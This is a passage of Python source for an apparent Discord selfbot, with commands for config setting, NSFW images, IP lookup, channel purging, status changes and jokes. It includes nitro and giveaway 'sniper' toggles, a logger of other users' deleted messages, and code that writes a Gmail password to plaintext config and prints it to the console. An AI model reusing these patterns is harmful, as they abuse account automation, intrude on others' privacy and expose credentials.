\n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def setstreamurl(ctx, newstreamurl = None): await ctx.message.delete() commandprint("Command 'setstreamurl' has been used by " + bot.user.name) if newstreamurl is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a streamurl \n" "Example: " + prefix + "setstreamurl https://twitch.tv/god", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("stream-url")] = newstreamurl with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("StreamURL has been set to " + newstreamurl) embed = discord.Embed(title="STREAM-URL CHANGED", description=f"Stream-URL is now '{newstreamurl}'. 
\n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['toggledml']) async def toggledeletedmessagelogger(ctx, *, boolean = None): await ctx.message.delete() commandprint("Command 'toggledeletedmessagelogger' has been used by " + bot.user.name) if boolean is None: embed = discord.Embed(title="DELETED-MESSAGE-LOGGER", description=f"You must provide a boolean, 'true' or 'false', no capitals.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) if boolean == "true": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("deleted-message-logger")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Deleted message logger has been set to " + boolean) embed = discord.Embed(title="DELETED-MESSAGE-LOGGER CHANGED", description=f"Deleted-message-logger is now '{boolean}'. 
\n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) elif boolean == "false": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("deleted-message-logger")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Deleted message logger has been set to " + boolean) embed = discord.Embed(title="DELETED-MESSAGE-LOGGER CHANGED", description=f"Deleted-message-logger is now '{boolean}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['togglegs']) async def togglegiveawaysniper(ctx, *, boolean = None): await ctx.message.delete() commandprint("Command 'togglegiveawaysniper' has been used by " + bot.user.name) if boolean is None: embed = discord.Embed(title="GIVEAWAY-SNIPER", description=f"You must provide a boolean, 'true' or 'false', no capitals.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) if boolean == "true": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("giveaway-sniper")] = boolean with 
open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Giveaway sniper has been set to " + boolean) embed = discord.Embed(title="GIVEAWAY-SNIPER CHANGED", description=f"Giveaway-Sniper is now '{boolean}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format( error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) elif boolean == "false": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("giveaway-sniper")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Giveaway sniper has been set to " + boolean) embed = discord.Embed(title="GIVEAWAY-SNIPER CHANGED", description=f"Giveaway-Sniper is now '{boolean}'. 
\n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format( error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['togglens']) async def togglenitrosniper(ctx, *, boolean = None): await ctx.message.delete() commandprint("Command 'togglenitrosniper' has been used by " + bot.user.name) if boolean is None: embed = discord.Embed(title="NITRO-SNIPER", description=f"You must provide a boolean, 'true' or 'false', no capitals.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) if boolean == "true": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("nitro-sniper")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Nitro sniper has been set to " + boolean) embed = discord.Embed(title="NITRO-SNIPER CHANGED", description=f"Nitro-Sniper is now '{boolean}'. 
\n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format( error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) elif boolean == "false": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("nitro-sniper")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Nitro sniper has been set to " + boolean) embed = discord.Embed(title="NITRO-SNIPER CHANGED", description=f"Nitro-Sniper is now '{boolean}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format( error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def setgmailaccount(ctx, *, newgmail = None): await ctx.message.delete() commandprint("Command 'setgmailaccount' has been used by " + bot.user.name) if newgmail is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a gmail \n" "Example: " + prefix + "setgmailaccount mars@gmail.com", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("gmail-account")] = newgmail with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, 
indent=4) eventprint("Gmail account has been set to " + newgmail) embed = discord.Embed(title="GMAIL-ACCOUNT CHANGED", description=f"Gmail-Account is now '{newgmail}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def setgmailpassword(ctx, *, newgmailpassword = None): await ctx.message.delete() commandprint("Command 'setgmailpassword' has been used by " + bot.user.name) if newgmailpassword is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a gmail password \n" "Example: " + prefix + "setgmailpassword qwerty123!", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("gmail-password")] = newgmailpassword with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Gmail account password has been set to " + newgmailpassword) embed = discord.Embed(title="GMAIL-PASSWORD CHANGED", description=f"Gmail password has been changed. 
\n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def lesbian(ctx): await ctx.message.delete() commandprint("Command 'lesbian' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/les") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command() async def lewd(ctx): await ctx.message.delete() commandprint("Command 'lewd' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/nsfw_neko_gif") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def blowjob(ctx): await ctx.message.delete() commandprint("Command 'blowjob' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/blowjob") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def tits(ctx): await ctx.message.delete() commandprint("Command 'tits' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/tits") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def boobs(ctx): await ctx.message.delete() commandprint("Command 'boobs' has been used 
by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/boobs") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def hentai(ctx): await ctx.message.delete() commandprint("Command 'hentai' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/Random_hentai_gif") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def tinyurl(ctx, *, link = None): await ctx.message.delete() commandprint("Command 'tinyurl' has been used by " + bot.user.name) if link is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a link \n" "Example: " + prefix + "tinyurl https://adf.ly/393jf8f8s9ghn", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: r = requests.get(f'http://tinyurl.com/api-create.php?url={link}').text embed = discord.Embed(title="**LINK SHORTENED**", description=f"Your shortened link is {r}", color=color) embed = discord.Embed(color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not contact API / invalid link ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not contact API / invalid link \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(name='first-message', aliases=['firstmsg', 'firstmessage']) async def _first_message(ctx, channel: discord.TextChannel = None): await ctx.message.delete() commandprint("Command 'firstmessage' has been used by " + bot.user.name) try: if channel is None: channel = ctx.channel first_message = 
(await channel.history(limit=1, oldest_first=True).flatten())[0] embed = discord.Embed(title="**FIRST MESSAGE FOUND**", color=color) embed.add_field(name="click to jump \n", value=f"[CLICK]({first_message.jump_url})") embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not find first message".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not find first message \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def topic(ctx): await ctx.message.delete() commandprint("Command 'topic' has been used by " + bot.user.name) try: r = requests.get('https://www.conversationstarters.com/generator.php').content soup = bs4(r, 'html.parser') topic = soup.find(id="random").text await ctx.send(topic) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Error unknown. 
\n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def logout(ctx): await ctx.message.delete() commandprint("Command 'logout' has been used by " + bot.user.name) try: embed = discord.Embed(title="", description="", color=color, ) embed.add_field(name="**LOGGING OUT**", value="Contact your host to re-enable the bot", inline=False) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) eventprint("Logging out") await bot.logout() except Exception as error: errorprint("Exception ' {0} ', UNKNOWN".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(pass_context=True) async def uptime(ctx): await ctx.message.delete() commandprint("Command 'uptime' has been used by " + bot.user.name) try: currenttime = time.time() difference = int(round(currenttime - start_time)) text = str(datetime.timedelta(seconds=difference)) embed = discord.Embed(title="**UPTIME**", description=text, colour=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Error unknown. 
\n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def cl(ctx, amount:int = None): await ctx.message.delete() if amount is None: commandprint("Command 'cl' has been used by " + bot.user.name + " but did not specify an integer so the command has been canceled.") embed = discord.Embed(colour=errorcolor) embed.add_field(name="Error:", value="Please specify an integer") embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: commandprint("Command 'cl' has been used by " + bot.user.name) async for msg in ctx.channel.history(limit=amount): if msg.author == bot.user: try: await msg.delete() except Exception as x: pass @bot.command(pass_context=True) async def admincl(ctx, limit: int = None): await ctx.message.delete() commandprint("Command 'admincl' has been used by " + bot.user.name) if limit is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a limit \n" "Example: " + prefix + "admincl 10", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) try: await ctx.channel.purge(limit=limit) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. 
\n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def iplookup(ctx, ipaddress = None): await ctx.message.delete() commandprint("Command 'iplookup' has been used by " + bot.user.name) if ipaddress is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a ip \n" "Example: " + prefix + "iplookup 1.1.1.1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: p = requests.post('http://ip-api.com/json/' + ipaddress) if '"status":"success"' in p.text: embed = discord.Embed(title=f" __**INFO**__ ", description=f"IP | **{ipaddress}**\n" f" Country | **{p.json()['country']}**\n" f" Country Code | **{p.json()['countryCode']}**\n" f" Region | **{p.json()['region']}**\n" f" Region Name | **{p.json()['regionName']}**\n" f" City | **{p.json()['city']}**\n" f" Timezone | **{p.json()['timezone']}**\n" f" Zip | **{p.json()['zip']}**\n" f" ISP | **{p.json()['isp']}**", color=color, footer=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: errorprint("Exception ' {0} ', Invalid IP") em = discord.Embed(title="Exception Error:", description="You have entered an invalid ip address.", color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['pfp', 'avatar']) async def av(ctx, *, user: discord.User=None): await ctx.message.delete() commandprint("Command 'av' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "avatar @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: format = "gif" user = user or ctx.author if not user.is_avatar_animated(): format = "png" avatar = user.avatar_url_as(format = format if format != "gif" else None) async with aiohttp.ClientSession() as session: 
async with session.get(str(avatar)) as resp: image = await resp.read() with io.BytesIO(image) as file: await ctx.send(file = discord.File(file, f"Avatar.{format}")) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User could not be found. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['guildpfp']) async def guildicon(ctx): await ctx.message.delete() commandprint("Command 'guildicon' has been used by " + bot.user.name) try: em = discord.Embed(title=ctx.guild.name, color=color) em.set_footer(text=footer) em.set_image(url=ctx.guild.icon_url) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Command must be used within servers. 
\n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def stream(ctx, *, message = None): await ctx.message.delete() if message is None: commandprint("Command 'stream' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "stream ur mum sleeping", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: commandprint("Command 'stream' has been used by " + bot.user.name + " with a message of '" + message + "'") try: stream = discord.Streaming(name=message, url=streamurl) await bot.change_presence(activity=stream) em = discord.Embed(title=f"**STATUS CHANGED**", description="Your streaming status has been set to **'" + message + "'**", color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You already have a custom status. 
\n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def watching(ctx, *, message = None): await ctx.message.delete() if message is None: commandprint("Command 'watching' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "watching flairings sleep", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'watching' has been used by " + bot.user.name + " with a message of '" + message + "'") await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=message)) em = discord.Embed(title=f"**STATUS CHANGED**", description="Your watching status has been set to **'" + message + "'**", color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You already have a custom status. 
\n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['playing']) async def game(ctx, *, message = None): await ctx.message.delete() if message is None: commandprint("Command 'watching' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a game \n" "Example: " + prefix + "game 2k", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'watching' has been used by " + bot.user.name + " with a message of '" + message + "'") game = discord.Game(name=message) em = discord.Embed(title=f"**STATUS CHANGED**", description="Your playing status has been set to **'" + message + "'**", color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) await bot.change_presence(activity=game) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You already have a custom status. 
\n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def listening(ctx, *, message = None): await ctx.message.delete() if message is None: commandprint("Command 'listening' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a listening \n" "Example: " + prefix + "listening flairings piss", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'listening' has been used by " + bot.user.name + " with a message of '" + message + "'") await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=message)) em = discord.Embed(title=f"**STATUS CHANGED**", description="Your listening status has been set to **'" + message + "'**", color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You already have a custom status. 
\n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def ascii(ctx, *, text = None): await ctx.message.delete() commandprint("Command 'ascii' has been used by " + bot.user.name) if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "ascii hello", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: r = requests.get(f'http://artii.herokuapp.com/make?text={urllib.parse.quote_plus(text)}').text if len('```'+r+'```') > 2000: errorprint("Exception ' {0} ', Message over 2000 CHARS long") em = discord.Embed(title="Exception Error:", description="Expected Exception: Message is too long \n Console Exception N/A", color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) return await ctx.send(f"```{r}```") except Exception as error: errorprint("Exception ' {0} ', Message over 2000 CHARS long".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Message over 2000 CHARS long \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(name='groupleaver', aliases=['leaveallgroups', 'leavegroup', 'leavegroups']) async def _group_leaver(ctx): await ctx.message.delete() commandprint("Command 'leaveallgroups' has been used by " + bot.user.name) try: for channel in bot.private_channels: if isinstance(channel, discord.GroupChannel): await channel.leave() except Exception as error: errorprint("Exception ' {0} ', UNKNOWN".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['dong', 'penis', 'cock', 'winky', 'shlong']) async def dick(ctx, *, user: 
discord.User=None): await ctx.message.delete() commandprint("Command 'dick' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "dick @Flairings" "\n (its huge.)", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: if user is None: user = ctx.author size = random.randint(1, 15) dong = "" for _i in range(0, size): dong += "=" em = discord.Embed(title=f"{user}'s Dick size", description=f"8{dong}D", colour=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User could not be found".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User could not be found. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['8ball']) async def _8ball(ctx, *, question = None): await ctx.message.delete() if question is None: commandprint("Command '8ball' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "8ball am i gay?", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command '8ball' has been used by " + bot.user.name + " with a message of '" + question + "'") responses = [ 'That is a no from me', 'It is not looking likely', 'It is quite possible', 'That is a definite yes!', 'Maybe', 'There is a good chance', 'LOL NO', 'yes :)', 'oh fella, pipe down g. 
nah lad', ] answer = random.choice(responses) embed = discord.Embed(color=color) embed.add_field(name="Question", value=question, inline=False) embed.add_field(name="Answer", value=answer, inline=False) embed.set_thumbnail(url="https://cdn.discordapp.com/attachments/720348929043988572/722447275561058314/1200px-8-Ball_Pool.svg.png") embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def gay(ctx, user: discord.User=None): await ctx.message.delete() commandprint("Command 'gay' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "gay @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: format = "gif" user = user or ctx.author if not user.is_avatar_animated(): format = "png" avatar = user.avatar_url_as(format=format if format != "gif" else None) em = discord.Embed(color=color) em.set_footer(text=footer) em.set_image(url=f"https://some-random-api.ml/canvas/gay?&avatar={avatar}") await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def wasted(ctx, user: discord.User=None): await ctx.message.delete() commandprint("Command 'wasted' has been used by " + bot.user.name) if user is None: 
embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "wasted @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: format = "gif" user = user or ctx.author if not user.is_avatar_animated(): format = "png" avatar = user.avatar_url_as(format=format if format != "gif" else None) em = discord.Embed(color=color) em.set_footer(text=footer) em.set_image(url=f"https://some-random-api.ml/canvas/wasted?&avatar={avatar}") await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def binarytotext(ctx, *, text = None): await ctx.message.delete() commandprint("Command 'binarytotext' has been used by " + bot.user.name) if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "binarytotext hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: req = requests.get(f'https://some-random-api.ml/binary?decode={text}') embed = discord.Embed(title="", color=color, ) embed.add_field(name="**BINARY TO TEXT RESULT**", value=f"{req.json()['text']} \n", inline=False) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not reach api / not binary".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not reach api / not binary \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def 
texttobinary(ctx, *, text = None): await ctx.message.delete() commandprint("Command 'texttobinary' has been used by " + bot.user.name) if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "texttobinary hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: req = requests.get(f'https://some-random-api.ml/binary?text={text}') embed = discord.Embed(title="", color=color, ) embed.add_field(name="**TEXT TO BINARY RESULT**", value=f"{req.json()['binary']} \n", inline=False) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not reach api / not binary".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not reach api / not english \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def lyricfinder(ctx, *, title = None): await ctx.message.delete() commandprint("Command 'lyricfinder' has been used by " + bot.user.name) if title is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a title \n" "Example: " + prefix + "lyricfinder number logan paul", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: req = requests.get(f'https://some-random-api.ml/lyrics?title={title}') embed = discord.Embed(title="**SONG FINDER**", description=f"{req.json()['lyrics']}", color=color, ) embed.add_field(name="**TITLE**", value=f"{req.json()['title']} \n", inline=False) embed.add_field(name="**AUTHOR**", value=f"{req.json()['author']} \n", inline=False) embed.add_field(name="**SOURCE**", value=f"{req.json()['links']} \n", inline=False) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) 
except Exception as error: errorprint("Exception ' {0} ', Embeds have a maximum character count of 2000".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Embeds have a maximum character count of 2000 \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def tweet(ctx, username: str = None, *, message: str = None): await ctx.message.delete() commandprint("Command 'tweet' has been used by " + bot.user.name) if username is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a username \n" "Example: " + prefix + "tweet Flairings wag1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif message is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "tweet Flairings wag1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: async with aiohttp.ClientSession() as cs: async with cs.get(f"https://nekobot.xyz/api/imagegen?type=tweet&username={username}&text={message}") as r: res = await r.json() em = discord.Embed() em.set_image(url=res["message"]) await ctx.send(embed=em, 